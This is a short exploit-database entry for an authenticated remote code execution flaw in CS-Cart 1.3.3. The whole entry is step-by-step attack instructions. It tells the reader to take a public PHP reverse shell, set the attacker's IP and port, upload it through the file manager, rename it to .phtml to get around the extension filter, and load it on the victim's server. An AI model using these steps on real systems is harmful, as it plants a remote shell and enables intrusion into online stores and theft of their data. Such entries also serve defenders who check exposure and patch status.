Share
## https://sploitus.com/exploit?id=PACKETSTORM:159577
# Exploit Title: CS-Cart authenticated RCE  
# Date: 2020-09-22  
# Exploit Author: 0xmmnbassel  
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html  
# Tested at: ver. 1.3.3  
# Vulnerability Type: authenticated RCE  
  
  
  
get PHP shells from  
http://pentestmonkey.net/tools/web-shells/php-reverse-shell  
edit IP && PORT  
Upload to file manager  
change the extension from .php to .phtml  
visit http://[victim]/skins/shell.phtml --> Profit. ...!